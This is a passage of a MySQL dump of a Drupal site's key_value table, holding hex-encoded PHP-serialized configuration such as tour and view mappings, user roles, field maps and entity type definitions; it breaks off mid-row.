('config.entity.key_store.tour', 'routes.*.route_name:entity.view.edit_display_form', 0x613a313a7b693a303b733a31383a22746f75722e746f75722e76696577732d7569223b7d),
('config.entity.key_store.tour', 'routes.*.route_name:entity.view.edit_form', 0x613a313a7b693a303b733a31383a22746f75722e746f75722e76696577732d7569223b7d),
('config.entity.key_store.tour', 'routes.*.route_name:language.add', 0x613a313a7b693a303b733a32323a22746f75722e746f75722e6c616e67756167652d616464223b7d),
('config.entity.key_store.tour', 'routes.*.route_name:locale.translate_page', 0x613a313a7b693a303b733a31363a22746f75722e746f75722e6c6f63616c65223b7d),
('config.entity.key_store.tour', 'uuid:797439d5-0a7f-4559-ae25-6cf5a65ebddf', 0x613a313a7b693a303b733a31383a22746f75722e746f75722e76696577732d7569223b7d),
('config.entity.key_store.tour', 'uuid:a748f797-d433-441f-8aaa-6078511fe704', 0x613a313a7b693a303b733a32333a22746f75722e746f75722e6c616e67756167652d65646974223b7d),
('config.entity.key_store.tour', 'uuid:b0f9d49d-c7f7-4777-ab79-271b01f2a7a7', 0x613a313a7b693a303b733a31363a22746f75722e746f75722e6c6f63616c65223b7d),
('config.entity.key_store.tour', 'uuid:cdc96f3b-81fb-4884-aa2e-16a8556f5590', 0x613a313a7b693a303b733a31383a22746f75722e746f75722e6c616e6775616765223b7d),
('config.entity.key_store.tour', 'uuid:e21c4ed9-837c-47a0-a61c-d38344fc35a1', 0x613a313a7b693a303b733a32323a22746f75722e746f75722e626c6f636b2d6c61796f7574223b7d),
('config.entity.key_store.tour', 'uuid:fdb84e25-8a78-46e8-8dd1-f5897d2aac6f', 0x613a313a7b693a303b733a32323a22746f75722e746f75722e6c616e67756167652d616464223b7d),
('config.entity.key_store.user_role', 'uuid:3797b732-483e-4a3d-89dd-ffa28b80704c', 0x613a313a7b693a303b733a32343a22757365722e726f6c652e636f6e74656e745f656469746f72223b7d),
('config.entity.key_store.user_role', 'uuid:4b2e27d1-0d0b-48cb-ae88-a8265af4c3d9', 0x613a313a7b693a303b733a31393a22757365722e726f6c652e616e6f6e796d6f7573223b7d),
('config.entity.key_store.user_role', 'uuid:c931d7a7-6fd8-412b-a533-dfe8d69d86f4', 0x613a313a7b693a303b733a32333a22757365722e726f6c652e61757468656e74696361746564223b7d),
('config.entity.key_store.user_role', 'uuid:fadad611-5c1f-41a5-bf50-581256275f0d', 0x613a313a7b693a303b733a32333a22757365722e726f6c652e61646d696e6973747261746f72223b7d),
('config.entity.key_store.view', 'uuid:009f7bc8-bd9d-4957-a511-2e11021604cc', 0x613a313a7b693a303b733a33313a2276696577732e766965772e636f6e74656e745f7472616e736c6174696f6e73223b7d),
('config.entity.key_store.view', 'uuid:18e702dc-b27e-4b1c-b205-191b7632e158', 0x613a313a7b693a303b733a32343a2276696577732e766965772e626c6f636b5f636f6e74656e74223b7d),
('config.entity.key_store.view', 'uuid:1b1e838a-b349-4b3c-bcba-a29cd87f94f0', 0x613a313a7b693a303b733a31363a2276696577732e766965772e66696c6573223b7d),
('config.entity.key_store.view', 'uuid:39ef5737-eeaf-4d9d-9aa8-427ec8e6bd36', 0x613a313a7b693a303b733a32303a2276696577732e766965772e66726f6e7470616765223b7d),
('config.entity.key_store.view', 'uuid:3ebcded6-7cf1-4518-9aba-d429e7a69bee', 0x613a313a7b693a303b733a31383a2276696577732e766965772e636f6d6d656e74223b7d),
('config.entity.key_store.view', 'uuid:685040a1-d2d9-4e89-a493-85e7111220a0', 0x613a313a7b693a303b733a32363a2276696577732e766965772e6c616e67756167655f63656e746572223b7d),
('config.entity.key_store.view', 'uuid:6d089c2d-b2b6-494e-8928-4e7fb85375a5', 0x613a313a7b693a303b733a31383a2276696577732e766965772e61726368697665223b7d),
('config.entity.key_store.view', 'uuid:7174284a-5e86-4c27-83eb-5d3f3a5aec3d', 0x613a313a7b693a303b733a32303a2276696577732e766965772e77686f5f735f6e6577223b7d),
('config.entity.key_store.view', 'uuid:722ab373-edcb-40a7-9443-f6bd75a7b0b5', 0x613a313a7b693a303b733a32353a2276696577732e766965772e636f6e74656e745f726563656e74223b7d),
('config.entity.key_store.view', 'uuid:7a5c878e-ca73-4799-b232-6780565132a2', 0x613a313a7b693a303b733a32343a2276696577732e766965772e7461786f6e6f6d795f7465726d223b7d),
('config.entity.key_store.view', 'uuid:7b499952-018e-455d-9599-de262c8e7d18', 0x613a313a7b693a303b733a32383a2276696577732e766965772e757365725f61646d696e5f70656f706c65223b7d),
('config.entity.key_store.view', 'uuid:8247c7da-139b-45d0-9a6e-3e0faee828fd', 0x613a313a7b693a303b733a31383a2276696577732e766965772e636f6e74656e74223b7d),
('config.entity.key_store.view', 'uuid:896fb740-b2bc-4daa-962c-a6cbd84b647e', 0x613a313a7b693a303b733a31363a2276696577732e766965772e6d65646961223b7d),
('config.entity.key_store.view', 'uuid:9fe77708-7c4c-45b1-a413-b1f530851462', 0x613a313a7b693a303b733a32353a2276696577732e766965772e72656c617465645f626c6f636b73223b7d),
('config.entity.key_store.view', 'uuid:b3a11113-1e4b-4b69-aa7d-7354ba6fe68c', 0x613a313a7b693a303b733a32333a2276696577732e766965772e616e6e6f756e63656d656e74223b7d),
('config.entity.key_store.view', 'uuid:bc1873c3-9de2-456c-8b95-d1799e631481', 0x613a313a7b693a303b733a31393a2276696577732e766965772e6163746976697479223b7d),
('config.entity.key_store.view', 'uuid:c136eaed-daf9-4009-a410-95cec882ad1a', 0x613a313a7b693a303b733a31373a2276696577732e766965772e736c69646572223b7d),
('config.entity.key_store.view', 'uuid:c49dacb3-ec82-409a-86ca-3bb0dba0f349', 0x613a313a7b693a303b733a31393a2276696577732e766965772e676c6f7373617279223b7d),
('config.entity.key_store.view', 'uuid:d5770df0-4708-4272-a49a-fadfc0288c30', 0x613a313a7b693a303b733a32343a2276696577732e766965772e6d656469615f6c696272617279223b7d),
('config.entity.key_store.view', 'uuid:ea9f09a9-cf0f-4784-834f-6893ec3e6ce5', 0x613a313a7b693a303b733a32333a2276696577732e766965772e77686f5f735f6f6e6c696e65223b7d),
('config.entity.key_store.view', 'uuid:f6be1325-bb65-4619-952b-cb58f13b63f3', 0x613a313a7b693a303b733a32363a2276696577732e766965772e636f6d6d656e74735f726563656e74223b7d),
('config.entity.key_store.view', 'uuid:fcd2e0e4-74a8-4192-9f15-6af283c45604', 0x613a313a7b693a303b733a31393a2276696577732e766965772e7761746368646f67223b7d),
('core.equivalent_updates', 'system', 0x613a323a7b693a31313130323b613a323a7b733a31303a2272616e5f757064617465223b733a353a223130343030223b733a32313a226675747572655f76657273696f6e5f737472696e67223b733a363a2231312e312e30223b7d693a31313330303b613a323a7b733a31303a2272616e5f757064617465223b733a353a223130363030223b733a32313a226675747572655f76657273696f6e5f737472696e67223b733a363a2231312e332e30223b7d7d),
('development_settings', 'disable_rendered_output_cache_bins', 0x4e3b),
('development_settings', 'twig_cache_disable', 0x4e3b),
('development_settings', 'twig_debug', 0x4e3b),
('entity.definitions.bundle_field_map', 'block_content', 0x613a313a7b733a343a22626f6479223b613a323a7b733a343a2274797065223b733a31373a22746578745f776974685f73756d6d617279223b733a373a2262756e646c6573223b613a313a7b733a353a226261736963223b733a353a226261736963223b7d7d7d),
('entity.definitions.bundle_field_map', 'comment', 0x613a313a7b733a31323a22636f6d6d656e745f626f6479223b613a323a7b733a343a2274797065223b733a393a22746578745f6c6f6e67223b733a373a2262756e646c6573223b613a313a7b733a373a22636f6d6d656e74223b733a373a22636f6d6d656e74223b7d7d7d),
('entity.definitions.bundle_field_map', 'media', 0x613a353a7b733a32323a226669656c645f6d656469615f617564696f5f66696c65223b613a323a7b733a343a2274797065223b733a343a2266696c65223b733a373a2262756e646c6573223b613a313a7b733a353a22617564696f223b733a353a22617564696f223b7d7d733a32303a226669656c645f6d656469615f646f63756d656e74223b613a323a7b733a343a2274797065223b733a343a2266696c65223b733a373a2262756e646c6573223b613a313a7b733a383a22646f63756d656e74223b733a383a22646f63756d656e74223b7d7d733a31373a226669656c645f6d656469615f696d616765223b613a323a7b733a343a2274797065223b733a353a22696d616765223b733a373a2262756e646c6573223b613a313a7b733a353a22696d616765223b733a353a22696d616765223b7d7d733a32343a226669656c645f6d656469615f6f656d6265645f766964656f223b613a323a7b733a343a2274797065223b733a363a22737472696e67223b733a373a2262756e646c6573223b613a313a7b733a31323a2272656d6f74655f766964656f223b733a31323a2272656d6f74655f766964656f223b7d7d733a32323a226669656c645f6d656469615f766964656f5f66696c65223b613a323a7b733a343a2274797065223b733a343a2266696c65223b733a373a2262756e646c6573223b613a313a7b733a353a22766964656f223b733a353a22766964656f223b7d7d7d),
('entity.definitions.bundle_field_map', 'node', 0x613a31363a7b733a31313a226669656c645f696d616765223b613a323a7b733a343a2274797065223b733a353a22696d616765223b733a373a2262756e646c6573223b613a313a7b733a373a2261727469636c65223b733a373a2261727469636c65223b7d7d733a373a22636f6d6d656e74223b613a323a7b733a343a2274797065223b733a373a22636f6d6d656e74223b733a373a2262756e646c6573223b613a313a7b733a373a2261727469636c65223b733a373a2261727469636c65223b7d7d733a31303a226669656c645f74616773223b613a323a7b733a343a2274797065223b733a31363a22656e746974795f7265666572656e6365223b733a373a2262756e646c6573223b613a313a7b733a373a2261727469636c65223b733a373a2261727469636c65223b7d7d733a343a22626f6479223b613a323a7b733a343a2274797065223b733a31373a22746578745f776974685f73756d6d617279223b733a373a2262756e646c6573223b613a363a7b733a343a2270616765223b733a343a2270616765223b733a373a2261727469636c65223b733a373a2261727469636c65223b733a31323a22616e6e6f756e63656d656e74223b733a31323a22616e6e6f756e63656d656e74223b733a31303a2261637469766974696573223b733a31303a2261637469766974696573223b733a363a22736c69646572223b733a363a22736c69646572223b733a31353a226c616e67756167655f63656e746572223b733a31353a226c616e67756167655f63656e746572223b7d7d733a32343a226669656c645f616e6e6f756e63655f706f73745f64617465223b613a323a7b733a343a2274797065223b733a383a226461746574696d65223b733a373a2262756e646c6573223b613a313a7b733a31323a22616e6e6f756e63656d656e74223b733a31323a22616e6e6f756e63656d656e74223b7d7d733a31393a226669656c645f646f776e6c6f61645f66696c65223b613a323a7b733a343a2274797065223b733a343a2266696c65223b733a373a2262756e646c6573223b613a313a7b733a31323a22616e6e6f756e63656d656e74223b733a31323a22616e6e6f756e63656d656e74223b7d7d733a31373a226669656c645f6465736372697074696f6e223b613a323a7b733a343a2274797065223b733a393a22746578745f6c6f6e67223b733a373a2262756e646c6573223b613a313a7b733a31323a22616e6e6f756e63656d656e74223b733a31323a22616e6e6f756e63656d656e74223b7d7d733a32303a226669656c645f616374697669746965735f696d67223b613a323a7b733a343a2274797065223b733a353a22696d616765223b733a373a2262756e646c6573223b613a313a7b733a31303a2261637469766974696573223b733a31303a2261637469766974696573223b7d7d733a32363a226669656c645f616374697669746965735f706f73745f64617465223b613a323a7b733a343a2274797065223b733a383a226461746574696d65223b733a373a2262756e646c6573223b613a313a7b733a31303a2261637469766974696573223b733a31303a2261637469766974696573223b7d7d733a32383a226669656c645f616374697669746965735f6465736372697074696f6e223b613a323a7b733a343a2274797065223b733a31373a22746578745f776974685f73756d6d617279223b733a373a2262756e646c6573223b613a313a7b733a31303a2261637469766974696573223b733a31303a2261637469766974696573223b7d7d733a33303a226669656c645f616374697669746965735f646f776e6c6f61645f66696c65223b613a323a7b733a343a2274797065223b733a343a2266696c65223b733a373a2262756e646c6573223b613a313a7b733a31303a2261637469766974696573223b733a31303a2261637469766974696573223b7d7d733a31363a226669656c645f736c696465725f696d67223b613a323a7b733a343a2274797065223b733a353a22696d616765223b733a373a2262756e646c6573223b613a313a7b733a363a22736c69646572223b733a363a22736c69646572223b7d7d733a32343a226669656c645f63656e7465725f6465736372697074696f6e223b613a323a7b733a343a2274797065223b733a31373a22746578745f776974685f73756d6d617279223b733a373a2262756e646c6573223b613a313a7b733a31353a226c616e67756167655f63656e746572223b733a31353a226c616e67756167655f63656e746572223b7d7d733a32363a226669656c645f63656e7465725f646f776e6c6f61645f66696c65223b613a323a7b733a343a2274797065223b733a343a2266696c65223b733a373a2262756e646c6573223b613a313a7b733a31353a226c616e67756167655f63656e746572223b733a31353a226c616e67756167655f63656e746572223b7d7d733a31363a226669656c645f63656e7465725f696d67223b613a323a7b733a343a2274797065223b733a353a22696d616765223b733a373a2262756e646c6573223b613a313a7b733a31353a226c616e67756167655f63656e746572223b733a31353a226c616e67756167655f63656e746572223b7d7d733a32323a226669656c645f63656e7465725f706f73745f64617465223b613a323a7b733a343a2274797065223b733a383a226461746574696d65223b733a373a2262756e646c6573223b613a313a7b733a31353a226c616e67756167655f63656e746572223b733a31353a226c616e67756167655f63656e746572223b7d7d7d),
('entity.definitions.bundle_field_map', 'user', 0x613a313a7b733a31323a22757365725f70696374757265223b613a323a7b733a343a2274797065223b733a353a22696d616765223b733a373a2262756e646c6573223b613a313a7b733a343a2275736572223b733a343a2275736572223b7d7d7d);
INSERT INTO `key_value` (`collection`, `name`, `value`) VALUES
('entity.definitions.installed', 'action.entity_type', 0x4f3a34323a2244727570616c5c436f72655c436f6e6669675c456e746974795c436f6e666967456e7469747954797065223a34333a7b733a353a22002a006964223b733a363a22616374696f6e223b733a383a22002a00636c617373223b733a32373a2244727570616c5c73797374656d5c456e746974795c416374696f6e223b733a31313a22002a0070726f7669646572223b733a363a2273797374656d223b733a31353a22002a007374617469635f6361636865223b623a303b733a31353a22002a0072656e6465725f6361636865223b623a313b733a31393a22002a0070657273697374656e745f6361636865223b623a313b733a31343a22002a00656e746974795f6b657973223b613a383a7b733a323a226964223b733a323a226964223b733a353a226c6162656c223b733a353a226c6162656c223b733a383a227265766973696f6e223b733a303a22223b733a363a2262756e646c65223b733a303a22223b733a383a226c616e67636f6465223b733a383a226c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a343a2275756964223b733a343a2275756964223b7d733a31363a22002a006f726967696e616c436c617373223b733a32373a2244727570616c5c73797374656d5c456e746974795c416374696f6e223b733a31313a22002a0068616e646c657273223b613a323a7b733a363a22616363657373223b733a34353a2244727570616c5c436f72655c456e746974795c456e74697479416363657373436f6e74726f6c48616e646c6572223b733a373a2273746f72616765223b733a34353a2244727570616c5c436f72655c436f6e6669675c456e746974795c436f6e666967456e7469747953746f72616765223b7d733a31393a22002a0061646d696e5f7065726d697373696f6e223b733a31383a2261646d696e697374657220616374696f6e73223b733a32353a22002a007065726d697373696f6e5f6772616e756c6172697479223b733a31313a22656e746974795f74797065223b733a383a22002a006c696e6b73223b613a303a7b7d733a32313a22002a0062756e646c655f656e746974795f74797065223b4e3b733a31323a22002a0062756e646c655f6f66223b4e3b733a31353a22002a0062756e646c655f6c6162656c223b4e3b733a31333a22002a00626173655f7461626c65223b4e3b733a32323a22002a007265766973696f6e5f646174615f7461626c65223b4e3b733a31373a22002a007265766973696f6e5f7461626c65223b4e3b733a31333a22002a00646174615f7461626c65223b4e3b733a31313a22002a00696e7465726e616c223b623a303b733a31353a22002a007472616e736c617461626c65223b623a303b733a31393a22002a0073686f775f7265766973696f6e5f7569223b623a303b733a383a22002a006c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a363a22416374696f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31393a22002a006c6162656c5f636f6c6c656374696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a373a22416374696f6e73223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31373a22002a006c6162656c5f73696e67756c6172223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a363a22616374696f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31353a22002a006c6162656c5f706c7572616c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a373a22616374696f6e73223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31343a22002a006c6162656c5f636f756e74223b613a333a7b733a383a2273696e67756c6172223b733a31333a2240636f756e7420616374696f6e223b733a363a22706c7572616c223b733a31343a2240636f756e7420616374696f6e73223b733a373a22636f6e74657874223b4e3b7d733a31353a22002a007572695f63616c6c6261636b223b4e3b733a383a22002a0067726f7570223b733a31333a22636f6e66696775726174696f6e223b733a31343a22002a0067726f75705f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a22436f6e66696775726174696f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a313a7b733a373a22636f6e74657874223b733a31373a22456e7469747920747970652067726f7570223b7d7d733a32323a22002a006669656c645f75695f626173655f726f757465223b4e3b733a32363a22002a00636f6d6d6f6e5f7265666572656e63655f746172676574223b623a303b733a32323a22002a006c6973745f63616368655f636f6e7465787473223b613a303a7b7d733a31383a22002a006c6973745f63616368655f74616773223b613a313a7b693a303b733a31383a22636f6e6669673a616374696f6e5f6c697374223b7d733a31343a22002a00636f6e73747261696e7473223b613a303a7b7d733a31333a22002a006164646974696f6e616c223b613a303a7b7d733a31343a22002a005f73657276696365496473223b613a303a7b7d733a31383a22002a005f656e7469747953746f7261676573223b613a303a7b7d733a32303a22002a00737472696e675472616e736c6174696f6e223b4e3b733a31363a22002a00636f6e6669675f707265666978223b4e3b733a31343a22002a006c6f6f6b75705f6b657973223b613a313a7b693a303b733a343a2275756964223b7d733a31363a22002a00636f6e6669675f6578706f7274223b613a353a7b693a303b733a323a226964223b693a313b733a353a226c6162656c223b693a323b733a343a2274797065223b693a333b733a363a22706c7567696e223b693a343b733a31333a22636f6e66696775726174696f6e223b7d733a32313a22002a006d6572676564436f6e6669674578706f7274223b613a303a7b7d7d),
('entity.definitions.installed', 'base_field_override.entity_type', 0x4f3a34323a2244727570616c5c436f72655c436f6e6669675c456e746974795c436f6e666967456e7469747954797065223a34333a7b733a353a22002a006964223b733a31393a22626173655f6669656c645f6f76657272696465223b733a383a22002a00636c617373223b733a34323a2244727570616c5c436f72655c4669656c645c456e746974795c426173654669656c644f76657272696465223b733a31313a22002a0070726f7669646572223b733a343a22636f7265223b733a31353a22002a007374617469635f6361636865223b623a303b733a31353a22002a0072656e6465725f6361636865223b623a313b733a31393a22002a0070657273697374656e745f6361636865223b623a313b733a31343a22002a00656e746974795f6b657973223b613a383a7b733a323a226964223b733a323a226964223b733a353a226c6162656c223b733a353a226c6162656c223b733a383a227265766973696f6e223b733a303a22223b733a363a2262756e646c65223b733a303a22223b733a383a226c616e67636f6465223b733a383a226c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a343a2275756964223b733a343a2275756964223b7d733a31363a22002a006f726967696e616c436c617373223b733a34323a2244727570616c5c436f72655c4669656c645c456e746974795c426173654669656c644f76657272696465223b733a31313a22002a0068616e646c657273223b613a323a7b733a373a2273746f72616765223b733a34323a2244727570616c5c436f72655c4669656c645c426173654669656c644f7665727269646553746f72616765223b733a363a22616363657373223b733a35353a2244727570616c5c436f72655c4669656c645c426173654669656c644f76657272696465416363657373436f6e74726f6c48616e646c6572223b7d733a31393a22002a0061646d696e5f7065726d697373696f6e223b4e3b733a32353a22002a007065726d697373696f6e5f6772616e756c6172697479223b733a31313a22656e746974795f74797065223b733a383a22002a006c696e6b73223b613a303a7b7d733a32313a22002a0062756e646c655f656e746974795f74797065223b4e3b733a31323a22002a0062756e646c655f6f66223b4e3b733a31353a22002a0062756e646c655f6c6162656c223b4e3b733a31333a22002a00626173655f7461626c65223b4e3b733a32323a22002a007265766973696f6e5f646174615f7461626c65223b4e3b733a31373a22002a007265766973696f6e5f7461626c65223b4e3b733a31333a22002a00646174615f7461626c65223b4e3b733a31313a22002a00696e7465726e616c223b623a303b733a31353a22002a007472616e736c617461626c65223b623a303b733a31393a22002a0073686f775f7265766973696f6e5f7569223b623a303b733a383a22002a006c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31393a2242617365206669656c64206f76657272696465223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31393a22002a006c6162656c5f636f6c6c656374696f6e223b733a303a22223b733a31373a22002a006c6162656c5f73696e67756c6172223b733a303a22223b733a31353a22002a006c6162656c5f706c7572616c223b733a303a22223b733a31343a22002a006c6162656c5f636f756e74223b613a303a7b7d733a31353a22002a007572695f63616c6c6261636b223b4e3b733a383a22002a0067726f7570223b733a31333a22636f6e66696775726174696f6e223b733a31343a22002a0067726f75705f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a22436f6e66696775726174696f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a313a7b733a373a22636f6e74657874223b733a31373a22456e7469747920747970652067726f7570223b7d7d733a32323a22002a006669656c645f75695f626173655f726f757465223b4e3b733a32363a22002a00636f6d6d6f6e5f7265666572656e63655f746172676574223b623a303b733a32323a22002a006c6973745f63616368655f636f6e7465787473223b613a303a7b7d733a31383a22002a006c6973745f63616368655f74616773223b613a313a7b693a303b733a33313a22636f6e6669673a626173655f6669656c645f6f766572726964655f6c697374223b7d733a31343a22002a00636f6e73747261696e7473223b613a303a7b7d733a31333a22002a006164646974696f6e616c223b613a303a7b7d733a31343a22002a005f73657276696365496473223b613a303a7b7d733a31383a22002a005f656e7469747953746f7261676573223b613a303a7b7d733a32303a22002a00737472696e675472616e736c6174696f6e223b4e3b733a31363a22002a00636f6e6669675f707265666978223b733a31393a22626173655f6669656c645f6f76657272696465223b733a31343a22002a006c6f6f6b75705f6b657973223b613a313a7b693a303b733a343a2275756964223b7d733a31363a22002a00636f6e6669675f6578706f7274223b613a31323a7b693a303b733a323a226964223b693a313b733a31303a226669656c645f6e616d65223b693a323b733a31313a22656e746974795f74797065223b693a333b733a363a2262756e646c65223b693a343b733a353a226c6162656c223b693a353b733a31313a226465736372697074696f6e223b693a363b733a383a227265717569726564223b693a373b733a31323a227472616e736c617461626c65223b693a383b733a31333a2264656661756c745f76616c7565223b693a393b733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b693a31303b733a383a2273657474696e6773223b693a31313b733a31303a226669656c645f74797065223b7d733a32313a22002a006d6572676564436f6e6669674578706f7274223b613a303a7b7d7d),
('entity.definitions.installed', 'block.entity_type', 0x4f3a34323a2244727570616c5c436f72655c436f6e6669675c456e746974795c436f6e666967456e7469747954797065223a34333a7b733a353a22002a006964223b733a353a22626c6f636b223b733a383a22002a00636c617373223b733a32353a2244727570616c5c626c6f636b5c456e746974795c426c6f636b223b733a31313a22002a0070726f7669646572223b733a353a22626c6f636b223b733a31353a22002a007374617469635f6361636865223b623a303b733a31353a22002a0072656e6465725f6361636865223b623a313b733a31393a22002a0070657273697374656e745f6361636865223b623a313b733a31343a22002a00656e746974795f6b657973223b613a383a7b733a323a226964223b733a323a226964223b733a363a22737461747573223b733a363a22737461747573223b733a383a227265766973696f6e223b733a303a22223b733a363a2262756e646c65223b733a303a22223b733a383a226c616e67636f6465223b733a383a226c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a343a2275756964223b733a343a2275756964223b7d733a31363a22002a006f726967696e616c436c617373223b733a32353a2244727570616c5c626c6f636b5c456e746974795c426c6f636b223b733a31313a22002a0068616e646c657273223b613a353a7b733a363a22616363657373223b733a33383a2244727570616c5c626c6f636b5c426c6f636b416363657373436f6e74726f6c48616e646c6572223b733a31323a22766965775f6275696c646572223b733a32393a2244727570616c5c626c6f636b5c426c6f636b566965774275696c646572223b733a31323a226c6973745f6275696c646572223b733a32393a2244727570616c5c626c6f636b5c426c6f636b4c6973744275696c646572223b733a343a22666f726d223b613a323a7b733a373a2264656661756c74223b733a32323a2244727570616c5c626c6f636b5c426c6f636b466f726d223b733a363a2264656c657465223b733a33333a2244727570616c5c626c6f636b5c466f726d5c426c6f636b44656c657465466f726d223b7d733a373a2273746f72616765223b733a34353a2244727570616c5c436f72655c436f6e6669675c456e746974795c436f6e666967456e7469747953746f72616765223b7d733a31393a22002a0061646d696e5f7065726d697373696f6e223b733a31373a2261646d696e697374657220626c6f636b73223b733a32353a22002a007065726d697373696f6e5f6772616e756c6172697479223b733a31313a22656e746974795f74797065223b733a383a22002a006c696e6b73223b613a343a7b733a31313a2264656c6574652d666f726d223b733a34343a222f61646d696e2f7374727563747572652f626c6f636b2f6d616e6167652f7b626c6f636b7d2f64656c657465223b733a393a22656469742d666f726d223b733a33373a222f61646d696e2f7374727563747572652f626c6f636b2f6d616e6167652f7b626c6f636b7d223b733a363a22656e61626c65223b733a34343a222f61646d696e2f7374727563747572652f626c6f636b2f6d616e6167652f7b626c6f636b7d2f656e61626c65223b733a373a2264697361626c65223b733a34353a222f61646d696e2f7374727563747572652f626c6f636b2f6d616e6167652f7b626c6f636b7d2f64697361626c65223b7d733a32313a22002a0062756e646c655f656e746974795f74797065223b4e3b733a31323a22002a0062756e646c655f6f66223b4e3b733a31353a22002a0062756e646c655f6c6162656c223b4e3b733a31333a22002a00626173655f7461626c65223b4e3b733a32323a22002a007265766973696f6e5f646174615f7461626c65223b4e3b733a31373a22002a007265766973696f6e5f7461626c65223b4e3b733a31333a22002a00646174615f7461626c65223b4e3b733a31313a22002a00696e7465726e616c223b623a303b733a31353a22002a007472616e736c617461626c65223b623a303b733a31393a22002a0073686f775f7265766973696f6e5f7569223b623a303b733a383a22002a006c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a353a22426c6f636b223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31393a22002a006c6162656c5f636f6c6c656374696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a363a22426c6f636b73223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31373a22002a006c6162656c5f73696e67756c6172223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a353a22626c6f636b223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31353a22002a006c6162656c5f706c7572616c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a363a22626c6f636b73223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31343a22002a006c6162656c5f636f756e74223b613a333a7b733a383a2273696e67756c6172223b733a31323a2240636f756e7420626c6f636b223b733a363a22706c7572616c223b733a31333a2240636f756e7420626c6f636b73223b733a373a22636f6e74657874223b4e3b7d733a31353a22002a007572695f63616c6c6261636b223b4e3b733a383a22002a0067726f7570223b733a31333a22636f6e66696775726174696f6e223b733a31343a22002a0067726f75705f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a22436f6e66696775726174696f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a313a7b733a373a22636f6e74657874223b733a31373a22456e7469747920747970652067726f7570223b7d7d733a32323a22002a006669656c645f75695f626173655f726f757465223b4e3b733a32363a22002a00636f6d6d6f6e5f7265666572656e63655f746172676574223b623a303b733a32323a22002a006c6973745f63616368655f636f6e7465787473223b613a303a7b7d733a31383a22002a006c6973745f63616368655f74616773223b613a313a7b693a303b733a31373a22636f6e6669673a626c6f636b5f6c697374223b7d733a31343a22002a00636f6e73747261696e7473223b613a303a7b7d733a31333a22002a006164646974696f6e616c223b613a303a7b7d733a31343a22002a005f73657276696365496473223b613a303a7b7d733a31383a22002a005f656e7469747953746f7261676573223b613a303a7b7d733a32303a22002a00737472696e675472616e736c6174696f6e223b4e3b733a31363a22002a00636f6e6669675f707265666978223b4e3b733a31343a22002a006c6f6f6b75705f6b657973223b613a323a7b693a303b733a353a227468656d65223b693a313b733a343a2275756964223b7d733a31363a22002a00636f6e6669675f6578706f7274223b613a383a7b693a303b733a323a226964223b693a313b733a353a227468656d65223b693a323b733a363a22726567696f6e223b693a333b733a363a22776569676874223b693a34